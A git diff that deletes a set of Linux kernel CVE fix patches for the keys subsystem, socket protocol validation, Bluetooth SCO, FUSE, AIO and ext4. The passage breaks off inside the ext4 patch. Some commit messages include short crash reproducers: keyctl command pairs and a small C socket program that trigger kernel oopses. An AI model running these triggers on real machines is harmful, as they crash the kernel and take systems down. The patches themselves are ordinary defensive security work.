@@ -1,125 +0,0 @@ -From 096fe9eaea40a17e125569f9e657e34cdb6d73bd Mon Sep 17 00:00:00 2001 -From: David Howells -Date: Tue, 24 Nov 2015 21:36:31 +0000 -Subject: KEYS: Fix handling of stored error in a negatively instantiated user - key - -If a user key gets negatively instantiated, an error code is cached in the -payload area. A negatively instantiated key may be then be positively -instantiated by updating it with valid data. However, the ->update key -type method must be aware that the error code may be there. - -The following may be used to trigger the bug in the user key type: - - keyctl request2 user user "" @u - keyctl add user user "a" @u - -which manifests itself as: - - BUG: unable to handle kernel paging request at 00000000ffffff8a - IP: [] __call_rcu.constprop.76+0x1f/0x280 kernel/rcu/tree.c:3046 - PGD 7cc30067 PUD 0 - Oops: 0002 [#1] SMP - Modules linked in: - CPU: 3 PID: 2644 Comm: a.out Not tainted 4.3.0+ #49 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 - task: ffff88003ddea700 ti: ffff88003dd88000 task.ti: ffff88003dd88000 - RIP: 0010:[] [] __call_rcu.constprop.76+0x1f/0x280 - [] __call_rcu.constprop.76+0x1f/0x280 kernel/rcu/tree.c:3046 - RSP: 0018:ffff88003dd8bdb0 EFLAGS: 00010246 - RAX: 00000000ffffff82 RBX: 0000000000000000 RCX: 0000000000000001 - RDX: ffffffff81e3fe40 RSI: 0000000000000000 RDI: 00000000ffffff82 - RBP: ffff88003dd8bde0 R08: ffff88007d2d2da0 R09: 0000000000000000 - R10: 0000000000000000 R11: ffff88003e8073c0 R12: 00000000ffffff82 - R13: ffff88003dd8be68 R14: ffff88007d027600 R15: ffff88003ddea700 - FS: 0000000000b92880(0063) GS:ffff88007fd00000(0000) knlGS:0000000000000000 - CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b - CR2: 00000000ffffff8a CR3: 000000007cc5f000 CR4: 00000000000006e0 - Stack: - ffff88003dd8bdf0 ffffffff81160a8a 0000000000000000 00000000ffffff82 - ffff88003dd8be68 ffff88007d027600 ffff88003dd8bdf0 ffffffff810a39e5 - ffff88003dd8be20 ffffffff812a31ab ffff88007d027600 
ffff88007d027620 - Call Trace: - [] kfree_call_rcu+0x15/0x20 kernel/rcu/tree.c:3136 - [] user_update+0x8b/0xb0 security/keys/user_defined.c:129 - [< inline >] __key_update security/keys/key.c:730 - [] key_create_or_update+0x291/0x440 security/keys/key.c:908 - [< inline >] SYSC_add_key security/keys/keyctl.c:125 - [] SyS_add_key+0x101/0x1e0 security/keys/keyctl.c:60 - [] entry_SYSCALL_64_fastpath+0x12/0x6a arch/x86/entry/entry_64.S:185 - -Note the error code (-ENOKEY) in EDX. - -A similar bug can be tripped by: - - keyctl request2 trusted user "" @u - keyctl add trusted user "a" @u - -This should also affect encrypted keys - but that has to be correctly -parameterised or it will fail with EINVAL before getting to the bit that -will crashes. - -Reported-by: Dmitry Vyukov -Signed-off-by: David Howells -Acked-by: Mimi Zohar -Signed-off-by: James Morris ---- - security/keys/encrypted-keys/encrypted.c | 2 ++ - security/keys/trusted.c | 5 ++++- - security/keys/user_defined.c | 5 ++++- - 3 files changed, 10 insertions(+), 2 deletions(-) - -diff --git a/security/keys/encrypted-keys/encrypted.c b/security/keys/encrypted-keys/encrypted.c -index 927db9f..696ccfa 100644 ---- a/security/keys/encrypted-keys/encrypted.c -+++ b/security/keys/encrypted-keys/encrypted.c -@@ -845,6 +845,8 @@ static int encrypted_update(struct key *key, struct key_preparsed_payload *prep) - size_t datalen = prep->datalen; - int ret = 0; - -+ if (test_bit(KEY_FLAG_NEGATIVE, &key->flags)) -+ return -ENOKEY; - if (datalen <= 0 || datalen > 32767 || !prep->data) - return -EINVAL; - -diff --git a/security/keys/trusted.c b/security/keys/trusted.c -index 903dace..16dec53 100644 ---- a/security/keys/trusted.c -+++ b/security/keys/trusted.c -@@ -1007,13 +1007,16 @@ static void trusted_rcu_free(struct rcu_head *rcu) - */ - static int trusted_update(struct key *key, struct key_preparsed_payload *prep) - { -- struct trusted_key_payload *p = key->payload.data[0]; -+ struct trusted_key_payload *p; - struct 
trusted_key_payload *new_p; - struct trusted_key_options *new_o; - size_t datalen = prep->datalen; - char *datablob; - int ret = 0; - -+ if (test_bit(KEY_FLAG_NEGATIVE, &key->flags)) -+ return -ENOKEY; -+ p = key->payload.data[0]; - if (!p->migratable) - return -EPERM; - if (datalen <= 0 || datalen > 32767 || !prep->data) -diff --git a/security/keys/user_defined.c b/security/keys/user_defined.c -index 28cb30f..8705d79 100644 ---- a/security/keys/user_defined.c -+++ b/security/keys/user_defined.c -@@ -120,7 +120,10 @@ int user_update(struct key *key, struct key_preparsed_payload *prep) - - if (ret == 0) { - /* attach the new data, displacing the old */ -- zap = key->payload.data[0]; -+ if (!test_bit(KEY_FLAG_NEGATIVE, &key->flags)) -+ zap = key->payload.data[0]; -+ else -+ zap = NULL; - rcu_assign_keypointer(key, upayload); - key->expiry = 0; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch deleted file mode 100644 index f66c0fb6..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch +++ /dev/null 
@@ -1,139 +0,0 @@ -From 79462ad02e861803b3840cc782248c7359451cd9 Mon Sep 17 00:00:00 2001 -From: Hannes Frederic Sowa -Date: Mon, 14 Dec 2015 22:03:39 +0100 -Subject: net: add validation for the socket syscall protocol argument -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -郭永刚 reported that one could simply crash the kernel as root by -using a simple program: - - int socket_fd; - struct sockaddr_in addr; - addr.sin_port = 0; - addr.sin_addr.s_addr = INADDR_ANY; - addr.sin_family = 10; - - socket_fd = socket(10,3,0x40000000); - connect(socket_fd , &addr,16); - -AF_INET, AF_INET6 sockets actually only support 8-bit protocol -identifiers. inet_sock's skc_protocol field thus is sized accordingly, -thus larger protocol identifiers simply cut off the higher bits and -store a zero in the protocol fields. - -This could lead to e.g. NULL function pointer because as a result of -the cut off inet_num is zero and we call down to inet_autobind, which -is NULL for raw sockets. - -kernel: Call Trace: -kernel: [] ? inet_autobind+0x2e/0x70 -kernel: [] inet_dgram_connect+0x54/0x80 -kernel: [] SYSC_connect+0xd9/0x110 -kernel: [] ? ptrace_notify+0x5b/0x80 -kernel: [] ? syscall_trace_enter_phase2+0x108/0x200 -kernel: [] SyS_connect+0xe/0x10 -kernel: [] tracesys_phase2+0x84/0x89 - -I found no particular commit which introduced this problem. - -CVE: CVE-2015-8543 -Cc: Cong Wang -Reported-by: 郭永刚 -Signed-off-by: Hannes Frederic Sowa -Signed-off-by: David S. 
Miller ---- - include/net/sock.h | 1 + - net/ax25/af_ax25.c | 3 +++ - net/decnet/af_decnet.c | 3 +++ - net/ipv4/af_inet.c | 3 +++ - net/ipv6/af_inet6.c | 3 +++ - net/irda/af_irda.c | 3 +++ - 6 files changed, 16 insertions(+) - -diff --git a/include/net/sock.h b/include/net/sock.h -index eaef414..c4205e0 100644 ---- a/include/net/sock.h -+++ b/include/net/sock.h -@@ -403,6 +403,7 @@ struct sock { - sk_no_check_rx : 1, - sk_userlocks : 4, - sk_protocol : 8, -+#define SK_PROTOCOL_MAX U8_MAX - sk_type : 16; - kmemcheck_bitfield_end(flags); - int sk_wmem_queued; -diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c -index ae3a47f..fbd0acf 100644 ---- a/net/ax25/af_ax25.c -+++ b/net/ax25/af_ax25.c -@@ -805,6 +805,9 @@ static int ax25_create(struct net *net, struct socket *sock, int protocol, - struct sock *sk; - ax25_cb *ax25; - -+ if (protocol < 0 || protocol > SK_PROTOCOL_MAX) -+ return -EINVAL; -+ - if (!net_eq(net, &init_net)) - return -EAFNOSUPPORT; - -diff --git a/net/decnet/af_decnet.c b/net/decnet/af_decnet.c -index eebf5ac..13d6b1a 100644 ---- a/net/decnet/af_decnet.c -+++ b/net/decnet/af_decnet.c -@@ -678,6 +678,9 @@ static int dn_create(struct net *net, struct socket *sock, int protocol, - { - struct sock *sk; - -+ if (protocol < 0 || protocol > SK_PROTOCOL_MAX) -+ return -EINVAL; -+ - if (!net_eq(net, &init_net)) - return -EAFNOSUPPORT; - -diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c -index 11c4ca1..5c5db66 100644 ---- a/net/ipv4/af_inet.c -+++ b/net/ipv4/af_inet.c -@@ -257,6 +257,9 @@ static int inet_create(struct net *net, struct socket *sock, int protocol, - int try_loading_module = 0; - int err; - -+ if (protocol < 0 || protocol >= IPPROTO_MAX) -+ return -EINVAL; -+ - sock->state = SS_UNCONNECTED; - - /* Look for the requested type/protocol pair. 
*/ -diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c -index 8ec0df7..9f5137c 100644 ---- a/net/ipv6/af_inet6.c -+++ b/net/ipv6/af_inet6.c -@@ -109,6 +109,9 @@ static int inet6_create(struct net *net, struct socket *sock, int protocol, - int try_loading_module = 0; - int err; - -+ if (protocol < 0 || protocol >= IPPROTO_MAX) -+ return -EINVAL; -+ - /* Look for the requested type/protocol pair. */ - lookup_protocol: - err = -ESOCKTNOSUPPORT; -diff --git a/net/irda/af_irda.c b/net/irda/af_irda.c -index e6aa48b..923abd6 100644 ---- a/net/irda/af_irda.c -+++ b/net/irda/af_irda.c -@@ -1086,6 +1086,9 @@ static int irda_create(struct net *net, struct socket *sock, int protocol, - struct sock *sk; - struct irda_sock *self; - -+ if (protocol < 0 || protocol > SK_PROTOCOL_MAX) -+ return -EINVAL; -+ - if (net != &init_net) - return -EAFNOSUPPORT; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch deleted file mode 100644 index fc4f4b88..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch +++ /dev/null @@ -1,27 +0,0 @@ -From 5233252fce714053f0151680933571a2da9cbfb4 Mon Sep 17 00:00:00 2001 -From: "David S. Miller" -Date: Tue, 15 Dec 2015 15:39:08 -0500 -Subject: bluetooth: Validate socket address length in sco_sock_bind(). - -Signed-off-by: David S. Miller ---- - net/bluetooth/sco.c | 3 +++ - 1 file changed, 3 insertions(+) - -diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c -index fe12966..f52bcbf 100644 ---- a/net/bluetooth/sco.c -+++ b/net/bluetooth/sco.c -@@ -526,6 +526,9 @@ static int sco_sock_bind(struct socket *sock, struct sockaddr *addr, - if (!addr || addr->sa_family != AF_BLUETOOTH) - return -EINVAL; - -+ if (addr_len < sizeof(struct sockaddr_sco)) -+ return -EINVAL; -+ - lock_sock(sk); - - if (sk->sk_state != BT_OPEN) { --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch
deleted file mode 100644
index a89c4805..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@ -From 3ca8138f014a913f98e6ef40e939868e1e9ea876 Mon Sep 17 00:00:00 2001 -From: Roman Gushchin -Date: Mon, 12 Oct 2015 16:33:44 +0300 -Subject: fuse: break infinite loop in fuse_fill_write_pages() - -I got a report about unkillable task eating CPU. Further -investigation shows, that the problem is in the fuse_fill_write_pages() -function. If iov's first segment has zero length, we get an infinite -loop, because we never reach iov_iter_advance() call. - -Fix this by calling iov_iter_advance() before repeating an attempt to -copy data from userspace. - -A similar problem is described in 124d3b7041f ("fix writev regression: -pan hanging unkillable and un-straceable"). If zero-length segmend -is followed by segment with invalid address, -iov_iter_fault_in_readable() checks only first segment (zero-length), -iov_iter_copy_from_user_atomic() skips it, fails at second and -returns zero -> goto again without skipping zero-length segment. - -Patch calls iov_iter_advance() before goto again: we'll skip zero-length -segment at second iteraction and iov_iter_fault_in_readable() will detect -invalid address. - -Special thanks to Konstantin Khlebnikov, who helped a lot with the commit -description. 
- -Cc: Andrew Morton -Cc: Maxim Patlasov -Cc: Konstantin Khlebnikov -Signed-off-by: Roman Gushchin -Signed-off-by: Miklos Szeredi -Fixes: ea9b9907b82a ("fuse: implement perform_write") -Cc: ---- - fs/fuse/file.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/fuse/file.c b/fs/fuse/file.c -index f523f2f..195476a 100644 ---- a/fs/fuse/file.c -+++ b/fs/fuse/file.c -@@ -1049,6 +1049,7 @@ static ssize_t fuse_fill_write_pages(struct fuse_req *req, - tmp = iov_iter_copy_from_user_atomic(page, ii, offset, bytes); - flush_dcache_page(page); - -+ iov_iter_advance(ii, tmp); - if (!tmp) { - unlock_page(page); - page_cache_release(page); -@@ -1061,7 +1062,6 @@ static ssize_t fuse_fill_write_pages(struct fuse_req *req, - req->page_descs[req->num_pages].length = tmp; - req->num_pages++; - -- iov_iter_advance(ii, tmp); - count += tmp; - pos += tmp; - offset += tmp; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch deleted file mode 100644 index 06b89153..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0001.patch +++ /dev/null 
@@ -1,84 +0,0 @@ -From 4c185ce06dca14f5cea192f5a2c981ef50663f2b Mon Sep 17 00:00:00 2001 -From: Al Viro -Date: Fri, 20 Mar 2015 20:17:32 -0400 -Subject: aio: lift iov_iter_init() into aio_setup_..._rw() - -the only non-trivial detail is that we do it before rw_verify_area(), -so we'd better cap the length ourselves in aio_setup_single_rw() -case (for vectored case rw_copy_check_uvector() will do that for us). - -Signed-off-by: Al Viro ---- - fs/aio.c | 17 +++++++++++------ - 1 file changed, 11 insertions(+), 6 deletions(-) - -diff --git a/fs/aio.c b/fs/aio.c -index 435ca29..7816e8e 100644 ---- a/fs/aio.c -+++ b/fs/aio.c -@@ -1357,7 +1357,8 @@ static ssize_t aio_setup_vectored_rw(struct kiocb *kiocb, - unsigned long *nr_segs, - size_t *len, - struct iovec **iovec, -- bool compat) -+ bool compat, -+ struct iov_iter *iter) - { - ssize_t ret; - -@@ -1378,6 +1379,7 @@ static ssize_t aio_setup_vectored_rw(struct kiocb *kiocb, - - /* len now reflect bytes instead of segs */ - *len = ret; -+ iov_iter_init(iter, rw, *iovec, *nr_segs, *len); - return 0; - } - -@@ -1385,14 +1387,18 @@ static ssize_t aio_setup_single_vector(struct kiocb *kiocb, - int rw, char __user *buf, - unsigned long *nr_segs, - size_t len, -- struct iovec *iovec) -+ struct iovec *iovec, -+ struct iov_iter *iter) - { -+ if (len > MAX_RW_COUNT) -+ len = MAX_RW_COUNT; - if (unlikely(!access_ok(!rw, buf, len))) - return -EFAULT; - - iovec->iov_base = buf; - iovec->iov_len = len; - *nr_segs = 1; -+ iov_iter_init(iter, rw, iovec, *nr_segs, len); - return 0; - } - -@@ -1438,10 +1444,10 @@ rw_common: - - if (opcode == IOCB_CMD_PREADV || opcode == IOCB_CMD_PWRITEV) - ret = aio_setup_vectored_rw(req, rw, buf, &nr_segs, -- &len, &iovec, compat); -+ &len, &iovec, compat, &iter); - else - ret = aio_setup_single_vector(req, rw, buf, &nr_segs, -- len, iovec); -+ len, iovec, &iter); - if (!ret) - ret = rw_verify_area(rw, file, &req->ki_pos, len); - if (ret < 0) { -@@ -1463,10 +1469,9 @@ rw_common: - 
file_start_write(file); - - if (iter_op) { -- iov_iter_init(&iter, rw, iovec, nr_segs, len); - ret = iter_op(req, &iter); - } else { -- ret = rw_op(req, iovec, nr_segs, req->ki_pos); -+ ret = rw_op(req, iter.iov, iter.nr_segs, req->ki_pos); - } - - if (rw == WRITE) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch deleted file mode 100644 index 7b75df93..00000000 --- a/Patches/Linux_CVEs/CVE-2015-8830/ANY/0002.patch +++ /dev/null 
@@ -1,106 +0,0 @@
-From a70b52ec1aaeaf60f4739edb1b422827cb6f3893 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds
-Date: Mon, 21 May 2012 16:06:20 -0700
-Subject: vfs: make AIO use the proper rw_verify_area() area helpers
-
-We had for some reason overlooked the AIO interface, and it didn't use
-the proper rw_verify_area() helper function that checks (for example)
-mandatory locking on the file, and that the size of the access doesn't
-cause us to overflow the provided offset limits etc.
-
-Instead, AIO did just the security_file_permission() thing (that
-rw_verify_area() also does) directly.
-
-This fixes it to do all the proper helper functions, which not only
-means that now mandatory file locking works with AIO too, we can
-actually remove lines of code.
-
-Reported-by: Manish Honap
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds
----
- fs/aio.c | 30 ++++++++++++++----------------
- 1 file changed, 14 insertions(+), 16 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3..e7f2fad 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- if (ret < 0)
- goto out;
-
-+ ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret);
-+ if (ret < 0)
-+ goto out;
-+
- kiocb->ki_nr_segs = kiocb->ki_nbytes;
- kiocb->ki_cur_seg = 0;
- /* ki_nbytes/left now reflect bytes instead of segs */
-@@ -1467,11 +1471,17 @@ out:
- return ret;
- }
-
--static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
-+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb)
- {
-+ int bytes;
-+
-+ bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left);
-+ if (bytes < 0)
-+ return bytes;
-+
- kiocb->ki_iovec = &kiocb->ki_inline_vec;
- kiocb->ki_iovec->iov_base = kiocb->ki_buf;
-- kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+ kiocb->ki_iovec->iov_len = bytes;
- kiocb->ki_nr_segs = 1;
- kiocb->ki_cur_seg = 0;
- return 0;
-@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf,
- kiocb->ki_left)))
- break;
-- ret = security_file_permission(file, MAY_READ);
-- if (unlikely(ret))
-- break;
-- ret = aio_setup_single_vector(kiocb);
-+ ret = aio_setup_single_vector(READ, file, kiocb);
- if (ret)
- break;
- ret = -EINVAL;
-@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf,
- kiocb->ki_left)))
- break;
-- ret = security_file_permission(file, MAY_WRITE);
-- if (unlikely(ret))
-- break;
-- ret = aio_setup_single_vector(kiocb);
-+ ret = aio_setup_single_vector(WRITE, file, kiocb);
- if (ret)
- break;
- ret = -EINVAL;
-@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- ret = -EBADF;
- if (unlikely(!(file->f_mode & FMODE_READ)))
- break;
-- ret = security_file_permission(file, MAY_READ);
-- if (unlikely(ret))
-- break;
- ret = aio_setup_vectored_rw(READ, kiocb, compat);
- if (ret)
- break;
-@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- ret = -EBADF;
- if (unlikely(!(file->f_mode & FMODE_WRITE)))
- break;
-- ret = security_file_permission(file, MAY_WRITE);
-- if (unlikely(ret))
-- break;
- ret = aio_setup_vectored_rw(WRITE, kiocb, compat);
- if (ret)
- break;
----
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch
deleted file mode 100644
index 16b5fa3f..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8839/ANY/0001.patch
+++ /dev/null
@@ -1,442 +0,0 @@ -From ea3d7209ca01da209cda6f0dea8be9cc4b7a933b Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 7 Dec 2015 14:28:03 -0500 -Subject: ext4: fix races between page faults and hole punching - -Currently, page faults and hole punching are completely unsynchronized. -This can result in page fault faulting in a page into a range that we -are punching after truncate_pagecache_range() has been called and thus -we can end up with a page mapped to disk blocks that will be shortly -freed. Filesystem corruption will shortly follow. Note that the same -race is avoided for truncate by checking page fault offset against -i_size but there isn't similar mechanism available for punching holes. - -Fix the problem by creating new rw semaphore i_mmap_sem in inode and -grab it for writing over truncate, hole punching, and other functions -removing blocks from extent tree and for read over page faults. We -cannot easily use i_data_sem for this since that ranks below transaction -start and we need something ranking above it so that it can be held over -the whole truncate / hole punching operation. Also remove various -workarounds we had in the code to reduce race window when page fault -could have created pages with stale mapping information. - -Signed-off-by: Jan Kara -Signed-off-by: Theodore Ts'o ---- - fs/ext4/ext4.h | 10 +++++++++ - fs/ext4/extents.c | 54 ++++++++++++++++++++++++-------------------- - fs/ext4/file.c | 66 ++++++++++++++++++++++++++++++++++++++++++++++-------- - fs/ext4/inode.c | 36 +++++++++++++++++++++-------- - fs/ext4/super.c | 1 + - fs/ext4/truncate.h | 2 ++ - 6 files changed, 127 insertions(+), 42 deletions(-) - -diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h -index cc7ca4e..348a5ff 100644 ---- a/fs/ext4/ext4.h -+++ b/fs/ext4/ext4.h -@@ -910,6 +910,15 @@ struct ext4_inode_info { - * by other means, so we have i_data_sem. 
- */ - struct rw_semaphore i_data_sem; -+ /* -+ * i_mmap_sem is for serializing page faults with truncate / punch hole -+ * operations. We have to make sure that new page cannot be faulted in -+ * a section of the inode that is being punched. We cannot easily use -+ * i_data_sem for this since we need protection for the whole punch -+ * operation and i_data_sem ranks below transaction start so we have -+ * to occasionally drop it. -+ */ -+ struct rw_semaphore i_mmap_sem; - struct inode vfs_inode; - struct jbd2_inode *jinode; - -@@ -2484,6 +2493,7 @@ extern int ext4_chunk_trans_blocks(struct inode *, int nrblocks); - extern int ext4_zero_partial_blocks(handle_t *handle, struct inode *inode, - loff_t lstart, loff_t lend); - extern int ext4_page_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf); -+extern int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf); - extern qsize_t *ext4_get_reserved_space(struct inode *inode); - extern void ext4_da_update_reserve_space(struct inode *inode, - int used, int quota_claim); -diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c -index 551353b..5be9ca5 100644 ---- a/fs/ext4/extents.c -+++ b/fs/ext4/extents.c -@@ -4770,7 +4770,6 @@ static long ext4_zero_range(struct file *file, loff_t offset, - int partial_begin, partial_end; - loff_t start, end; - ext4_lblk_t lblk; -- struct address_space *mapping = inode->i_mapping; - unsigned int blkbits = inode->i_blkbits; - - trace_ext4_zero_range(inode, offset, len, mode); -@@ -4786,17 +4785,6 @@ static long ext4_zero_range(struct file *file, loff_t offset, - } - - /* -- * Write out all dirty pages to avoid race conditions -- * Then release them. -- */ -- if (mapping->nrpages && mapping_tagged(mapping, PAGECACHE_TAG_DIRTY)) { -- ret = filemap_write_and_wait_range(mapping, offset, -- offset + len - 1); -- if (ret) -- return ret; -- } -- -- /* - * Round up offset. 
This is not fallocate, we neet to zero out - * blocks, so convert interior block aligned part of the range to - * unwritten and possibly manually zero out unaligned parts of the -@@ -4856,16 +4844,22 @@ static long ext4_zero_range(struct file *file, loff_t offset, - flags |= (EXT4_GET_BLOCKS_CONVERT_UNWRITTEN | - EXT4_EX_NOCACHE); - -- /* Now release the pages and zero block aligned part of pages*/ -- truncate_pagecache_range(inode, start, end - 1); -- inode->i_mtime = inode->i_ctime = ext4_current_time(inode); -- - /* Wait all existing dio workers, newcomers will block on i_mutex */ - ext4_inode_block_unlocked_dio(inode); - inode_dio_wait(inode); - -+ /* -+ * Prevent page faults from reinstantiating pages we have -+ * released from page cache. -+ */ -+ down_write(&EXT4_I(inode)->i_mmap_sem); -+ /* Now release the pages and zero block aligned part of pages */ -+ truncate_pagecache_range(inode, start, end - 1); -+ inode->i_mtime = inode->i_ctime = ext4_current_time(inode); -+ - ret = ext4_alloc_file_blocks(file, lblk, max_blocks, new_size, - flags, mode); -+ up_write(&EXT4_I(inode)->i_mmap_sem); - if (ret) - goto out_dio; - } -@@ -5524,17 +5518,22 @@ int ext4_collapse_range(struct inode *inode, loff_t offset, loff_t len) - goto out_mutex; - } - -- truncate_pagecache(inode, ioffset); -- - /* Wait for existing dio to complete */ - ext4_inode_block_unlocked_dio(inode); - inode_dio_wait(inode); - -+ /* -+ * Prevent page faults from reinstantiating pages we have released from -+ * page cache. 
-+ */ -+ down_write(&EXT4_I(inode)->i_mmap_sem); -+ truncate_pagecache(inode, ioffset); -+ - credits = ext4_writepage_trans_blocks(inode); - handle = ext4_journal_start(inode, EXT4_HT_TRUNCATE, credits); - if (IS_ERR(handle)) { - ret = PTR_ERR(handle); -- goto out_dio; -+ goto out_mmap; - } - - down_write(&EXT4_I(inode)->i_data_sem); -@@ -5573,7 +5572,8 @@ int ext4_collapse_range(struct inode *inode, loff_t offset, loff_t len) - - out_stop: - ext4_journal_stop(handle); --out_dio: -+out_mmap: -+ up_write(&EXT4_I(inode)->i_mmap_sem); - ext4_inode_resume_unlocked_dio(inode); - out_mutex: - mutex_unlock(&inode->i_mutex); -@@ -5660,17 +5660,22 @@ int ext4_insert_range(struct inode *inode, loff_t offset, loff_t len) - goto out_mutex; - } - -- truncate_pagecache(inode, ioffset); -- - /* Wait for existing dio to complete */ - ext4_inode_block_unlocked_dio(inode); - inode_dio_wait(inode); - -+ /* -+ * Prevent page faults from reinstantiating pages we have released from -+ * page cache. -+ */ -+ down_write(&EXT4_I(inode)->i_mmap_sem); -+ truncate_pagecache(inode, ioffset); -+ - credits = ext4_writepage_trans_blocks(inode); - handle = ext4_journal_start(inode, EXT4_HT_TRUNCATE, credits); - if (IS_ERR(handle)) { - ret = PTR_ERR(handle); -- goto out_dio; -+ goto out_mmap; - } - - /* Expand file to avoid data loss if there is error while shifting */ -@@ -5741,7 +5746,8 @@ int ext4_insert_range(struct inode *inode, loff_t offset, loff_t len) - - out_stop: - ext4_journal_stop(handle); --out_dio: -+out_mmap: -+ up_write(&EXT4_I(inode)->i_mmap_sem); - ext4_inode_resume_unlocked_dio(inode); - out_mutex: - mutex_unlock(&inode->i_mutex); -diff --git a/fs/ext4/file.c b/fs/ext4/file.c -index 113837e..0d24ebc 100644 ---- a/fs/ext4/file.c -+++ b/fs/ext4/file.c -@@ -209,15 +209,18 @@ static int ext4_dax_fault(struct vm_area_struct *vma, struct vm_fault *vmf) - { - int result; - handle_t *handle = NULL; -- struct super_block *sb = file_inode(vma->vm_file)->i_sb; -+ struct inode *inode = 
file_inode(vma->vm_file); -+ struct super_block *sb = inode->i_sb; - bool write = vmf->flags & FAULT_FLAG_WRITE; - - if (write) { - sb_start_pagefault(sb); - file_update_time(vma->vm_file); -+ down_read(&EXT4_I(inode)->i_mmap_sem); - handle = ext4_journal_start_sb(sb, EXT4_HT_WRITE_PAGE, - EXT4_DATA_TRANS_BLOCKS(sb)); -- } -+ } else -+ down_read(&EXT4_I(inode)->i_mmap_sem); - - if (IS_ERR(handle)) - result = VM_FAULT_SIGBUS; -@@ -228,8 +231,10 @@ static int ext4_dax_fault(struct vm_area_struct *vma, struct vm_fault *vmf) - if (write) { - if (!IS_ERR(handle)) - ext4_journal_stop(handle); -+ up_read(&EXT4_I(inode)->i_mmap_sem); - sb_end_pagefault(sb); -- } -+ } else -+ up_read(&EXT4_I(inode)->i_mmap_sem); - - return result; - } -@@ -246,10 +251,12 @@ static int ext4_dax_pmd_fault(struct vm_area_struct *vma, unsigned long addr, - if (write) { - sb_start_pagefault(sb); - file_update_time(vma->vm_file); -+ down_read(&EXT4_I(inode)->i_mmap_sem); - handle = ext4_journal_start_sb(sb, EXT4_HT_WRITE_PAGE, - ext4_chunk_trans_blocks(inode, - PMD_SIZE / PAGE_SIZE)); -- } -+ } else -+ down_read(&EXT4_I(inode)->i_mmap_sem); - - if (IS_ERR(handle)) - result = VM_FAULT_SIGBUS; -@@ -260,30 +267,71 @@ static int ext4_dax_pmd_fault(struct vm_area_struct *vma, unsigned long addr, - if (write) { - if (!IS_ERR(handle)) - ext4_journal_stop(handle); -+ up_read(&EXT4_I(inode)->i_mmap_sem); - sb_end_pagefault(sb); -- } -+ } else -+ up_read(&EXT4_I(inode)->i_mmap_sem); - - return result; - } - - static int ext4_dax_mkwrite(struct vm_area_struct *vma, struct vm_fault *vmf) - { -- return dax_mkwrite(vma, vmf, ext4_get_block_dax, -- ext4_end_io_unwritten); -+ int err; -+ struct inode *inode = file_inode(vma->vm_file); -+ -+ sb_start_pagefault(inode->i_sb); -+ file_update_time(vma->vm_file); -+ down_read(&EXT4_I(inode)->i_mmap_sem); -+ err = __dax_mkwrite(vma, vmf, ext4_get_block_dax, -+ ext4_end_io_unwritten); -+ up_read(&EXT4_I(inode)->i_mmap_sem); -+ sb_end_pagefault(inode->i_sb); -+ -+ return 
